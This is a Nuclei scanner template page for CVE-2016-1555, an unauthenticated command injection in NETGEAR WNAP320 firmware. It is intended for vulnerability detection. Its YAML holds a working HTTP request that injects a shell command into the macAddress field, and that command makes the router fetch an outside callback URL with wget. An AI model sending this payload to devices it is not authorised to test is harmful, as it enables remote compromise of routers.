Skip to content
Nuclei Templates

NETGEAR WNAP320 Access Point Firmware - Remote Command Injection

ID: CVE-2016-1555

Severity: critical

Author: gy741

Tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev

Description

Section titled “Description”

NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

YAML Source

Section titled “YAML Source”
id: CVE-2016-1555


info:
  name: NETGEAR WNAP320 Access Point Firmware - Remote Command Injection
  author: gy741
  severity: critical
  description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.
  remediation: |
    Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
  reference:
    - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
    - https://nvd.nist.gov/vuln/detail/CVE-2016-1555
    - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic
    - http://seclists.org/fulldisclosure/2016/Feb/112
    - http://packetstormsecurity.com/files/135956/D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-1555
    cwe-id: CWE-77
    epss-score: 0.97373
    epss-percentile: 0.99904
    cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: netgear
    product: wnap320_firmware
  tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev


http:
  - raw:
      - |
        POST /boardDataWW.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded


        macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit


    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 490a00463044022007586729c9b5bfc60b8df23a68fd05a44d0b0dc852f2855903d66463ef1864ce02200322bf44fe1ef27308b8dfdb87634f6425261e556e4d960719e5178b045f0ccd:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-1555.yaml"

View on Github